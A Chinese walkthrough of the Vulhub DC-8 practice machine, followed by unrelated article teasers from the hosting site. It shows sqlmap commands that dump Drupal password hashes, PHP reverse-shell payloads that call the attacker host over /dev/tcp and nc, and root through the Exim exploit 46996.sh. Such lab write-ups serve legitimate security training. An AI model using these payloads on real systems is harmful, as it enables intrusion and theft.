Vulhub 靶场训练 DC-8解析

一、环境搭建

kali的IP地址:192.168.200.14

DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接

若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

1707096409_65c0395921b40dc60ff96.png!small?1707096410866

第二种方式:

netdiscover -r 192.168.200.0/24

1707096416_65c039601181f4d8b1c39.png!small?1707096417428

2、开放端口探测

nmap -sV -p-  192.168.200.13 

1707096425_65c039690ea669f78bb6c.png!small?1707096426517

开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

1707096435_65c039730c337d1afd246.png!small?1707096435976

1707096440_65c03978b5445e89cc547.png!small?1707096441695

1707096446_65c0397e8e10780b3a8ed.png!small?1707096447687

查看robots。txt文件

1707096453_65c03985d5c12d553a15e.png!small?1707096454863

这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面

1707096463_65c0398f22eef008ab219.png!small?1707096464271

和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的

不过页面中存在这样的三个不同的URL:

http://192.168.200.13/?nid=1

http://192.168.200.13/?nid=2

http://192.168.200.13/?nid=3

可能存在文件包含和SQL注入的漏洞

1707096470_65c039962f0f115be5ec5.png!small?1707096471645

SQLMAP

1、扫描数据库

sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

1707096477_65c0399d72bfdc0d23575.png!small?1707096478950

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

1707096485_65c039a5d4af8cf95cfed.png!small?1707096487029

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

1707096514_65c039c21d342f8fe79b0.png!small?1707096515383

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

1707096522_65c039ca6b2365f349616.png!small?1707096523660

账号:admin

密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john

密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

1707096531_65c039d3bb66f35725e7e.png!small?1707096532801

1707096536_65c039d81cbd1402d3f97.png!small?1707096537157

爆破出来密文:turtle

试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了

1707096543_65c039df78274a11f26ce.png!small?1707096544679

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码

1707096551_65c039e79bfdde944fbc5.png!small?1707096552648

登录成功!

1707096560_65c039f011ecd7e3c15ad.png!small?1707096561194

还是运用上一靶场的方法,找一找能上传一句话木马的php文件

连不上。然后显示phpinfo的地址死活没反应

直接获取shell

PHP反弹 shell(Post 请求发送命令)<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?> 

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码

1707096569_65c039f9a28c02c881412.png!small?1707096570796

1707096577_65c03a01c32a87b84ba20.png!small?1707096578738

成功反弹shell

1707096584_65c03a08b316ebe7af53b.png!small?1707096585882

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

1707096593_65c03a11292240a711ffe.png!small?1707096594204

查询Exim 版本为4.89

1707096599_65c03a17d0a1b56852b03.png!small?1707096601070

利用kali搜索EXP

1707096607_65c03a1f33af4c2c75f53.png!small?1707096608721

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh  

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

1707096618_65c03a2ab235c83dad241.png!small?1707096619975

文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

1707096624_65c03a3099b52fea1d07b.png!small?1707096625612

赋予可执行权限

1707096631_65c03a37429f8a5dd4cb6.png!small?1707096632431

接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限

1707096639_65c03a3f0fd4448180713.png!small?1707096640196

查看脚本的使用规则,又两个参数可用

1707096646_65c03a46a9b6db15e4945.png!small?1707096647939

将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功

1707096655_65c03a4f05f984e4d9eac.png!small?1707096656246

近到root目录,查看最终flag内容

1707096662_65c03a56e5e5373c325fd.png!small?1707096664524

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/700970.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Vue事件处理之v-on

1. 使用及定义 定义方法 function 方法名称(接受的event或是什么都不写) {//不管方法后括号内写与不写event,都可以接受到方法内表达式 }//定义一个接受参数的方法,此时也会在传入event function 方法名称(传入参数) {//可接受传入参数与event方法内表达式 } //定义一个接受参…

说一下 JVM 有哪些垃圾回收器?

如果说垃圾收集算法是内存回收的方法论&#xff0c;那么垃圾收集器就是内存回收的具体实现。下图展示了7种作用于不同分代的收集器&#xff0c;其中用于回收新生代的收集器包括Serial、ParNew、Parallel Scavenge&#xff0c;回收老年代的收集器包括SerialOld、Parallel Old、C…

恒创科技:香港服务器和香港云服务器哪个好啊?

"香港服务器"和"香港云服务器"&#xff0c;是两种不同的香港区域的服务器&#xff0c;免备案&#xff0c;都有各自的优势和适用场景&#xff0c;取决于您的需求和预算。以下是它们的一些区别和特点&#xff1a; 香港服务器&#xff1a; 物理服务器&#xf…

第2.5章 StarRocks表设计——行列混存表

注&#xff1a;本篇文章阐述的是StarRocks- 3.2.3版本的行列混存表 一、概述 1.1 背景 StarRocks 基于列存格式引擎构建&#xff0c;在高并发场景&#xff0c;用户希望从系统中获取整行数据。当表宽时&#xff0c;列存格式将放大随机IO和读写。自3.2.3开始&#xff0c;StarRo…

密码算法简单整理

密码组成 国外的密码算法&#xff1a; DES、3DES、AES、SHA1、SHA2、SHA3、DSA、RSA、RC4等 高危密码算法&#xff1a; MD5、DES、RSA1024以下、SSH1.0、SSL3.0以下、SHA1等 密码算法通常可分为三大类&#xff1a; 对称密码算法 非对称密码算法 密码杂凑算法 1.对称密码算法&am…

LeetCode 1637.两点之间不包含任何点的最宽垂直区域

给你 n 个二维平面上的点 points &#xff0c;其中 points[i] [xi, yi] &#xff0c;请你返回两点之间内部不包含任何点的 最宽垂直区域 的宽度。 垂直区域 的定义是固定宽度&#xff0c;而 y 轴上无限延伸的一块区域&#xff08;也就是高度为无穷大&#xff09;。 最宽垂直区…

udp服务器【Linux网络编程】

目录 一、UDP服务器 1、创建套接字 2、绑定套接字 3、运行 1&#xff09;读取数据 2&#xff09;发送数据 二、UDP客户端 创建套接字&#xff1a; 客户端不用手动bind 收发数据 处理消息和网络通信解耦 三、应用场景 1、服务端执行命令 2、Windows上的客户端 3…

2278. 企鹅游行(最大流,拆点)

活动 - AcWing 在南极附近的某个地方&#xff0c;一些企鹅正站在一些浮冰上。 作为群居动物&#xff0c;企鹅们喜欢聚在一起&#xff0c;因此&#xff0c;它们想在同一块浮冰上会合。 企鹅们不想淋湿自己&#xff0c;所以它们只能利用自己有限的跳跃能力&#xff0c;在一块块…

UnityWebGL 设置全屏

这是Unity导出Web默认打开的页面尺寸 修改后效果 修改 index.html 文件 1.div元素的id属性值为"unity-container"&#xff0c;宽度和高度都设置为100%&#xff0c;意味着该div元素将占据整个父容器的空间。canvas元素的id属性值为"unity-canvas"&#xff…

论文阅读——SimpleClick

SimpleClick: Interactive Image Segmentation with Simple Vision Transformers 模型直接在VIT上增加交互是分割 用VIT MAE方法训练的预训练权重 用交互式分割方法微调&#xff0c;微调流程&#xff1a; 1、在当前分割自动模拟点击&#xff0c;没有人为提供的点击 受到RITM启发…

uni-app nvue vue3 setup中实现加载webview,解决nvue中获取不到webview实例的问题

注意下面的方法只能在app端使用&#xff0c; let wv plus.webview.create("","custom-webview",{plusrequire:"none", uni-app: none, width: 300,height:400,top:uni.getSystemInfoSync().statusBarHeight44 }) wv.loadURL("https://ww…

使用PM2实现高效的应用监控与管理

微信搜索“好朋友乐平”关注公众号。 1. pm2 PM2 是一个流行的进程管理器&#xff0c;用于 Node.js 应用程序。它支持应用程序的负载均衡、自动重启、日志管理、监控以及多环境管理等功能。PM2让开发者能够以守护进程的方式运行和管理 Node.js 应用&#xff0c;即使在应用崩溃…

基于springboot+vue的精准扶贫管理系统(前后端分离)

博主主页&#xff1a;猫头鹰源码 博主简介&#xff1a;Java领域优质创作者、CSDN博客专家、阿里云专家博主、公司架构师、全网粉丝5万、专注Java技术领域和毕业设计项目实战&#xff0c;欢迎高校老师\讲师\同行交流合作 ​主要内容&#xff1a;毕业设计(Javaweb项目|小程序|Pyt…

中国农业无人机行业市场现状分析与投资前景预测研究报告

全版价格&#xff1a;壹捌零零 报告版本&#xff1a;下单后会更新至最新版本 交货时间&#xff1a;1-2天 第一章农业无人机行业发展综述 第一节农业无人机行业定义及分类 一、农业无人机行业的定义 农业无人机是一种无人驾驶的飞行器来帮助优化农业经营&#xff0c;增加作…

[rust] 11 所有权

文章目录 一 背景二 Stack 和 Heap2.1 Stack2.2 Heap2.3 性能区别2.4 所有权和堆栈 三 所有权原则3.1 变量作用域3.2 String 类型示例 四 变量绑定背后的数据交互4.1 所有权转移4.1.1 基本类型: 拷贝, 不转移所有权4.1.2 分配在 Heap 的类型: 转移所有权 4.2 Clone(深拷贝)4.3 …

C++基础知识(六:继承)

首先我们应该知道C的三大特性就是封装、继承和多态。 此篇文章将详细的讲解继承的作用和使用方法。 继承 一个类&#xff0c;继承另一个已有的类&#xff0c;创建的过程 父类(基类)派生出子类(派生类)的过程 继承提高了代码的复用性 【1】继承的格式 class 类名:父类名 {}; 【…

SpringMVC 学习(三)之 @RequestMapping 注解

目录 1 RequestMapping 注解介绍 2 RequestMapping 注解的位置 3 RequestMapping 注解的 value 属性 4 RequestMapping 注解的 method 属性 5 RequestMapping 注解的 params 属性&#xff08;了解&#xff09; 6 RequestMapping 注解的 headers 属性&#xff08;了解&…

Linux安装jdk、tomcat、MySQL离线安装与启动

一、JDK和Tomcat的安装 1.JDK安装 直接上传到Linux服务器的&#xff0c;上传jdk、tomcat安装包 解压JDK安装包 //解压jdk tar -zxvf jdk-8u151-linux-x64.tar.gz 置环境变量(JAVA_HOME和PATH) vim /etc/profile 在文件末尾添加以下内容&#xff1a; //java environment expo…

osg qt5.15 osg3.6.3 osgEarth3.1 编译爬山

Demo演示&#xff1a;Qt5.15.2OSG3.6.3OsgEarth3.1的QtCreator下的msvc2019x64版本 osgQt编译 步骤一&#xff1a;下载解压 步骤二&#xff1a;CMake配置 步骤三&#xff1a;CMake配置添加osg环境 步骤四&#xff1a;CMake配置添加Qt环境 步骤五&#xff1a;CMake修改CMakeLis…

R语言入门笔记2.6

描述统计 分类数据与顺序数据的图表展示 为了下面代码便于看出颜色参数所对应的值&#xff0c;在这里先集中介绍&#xff0c; col1是黑色&#xff0c;2是粉红&#xff0c;3是绿色&#xff0c;4是天蓝&#xff0c;5是浅蓝&#xff0c;6是紫红&#xff0c;7是黄色&#xff0c;…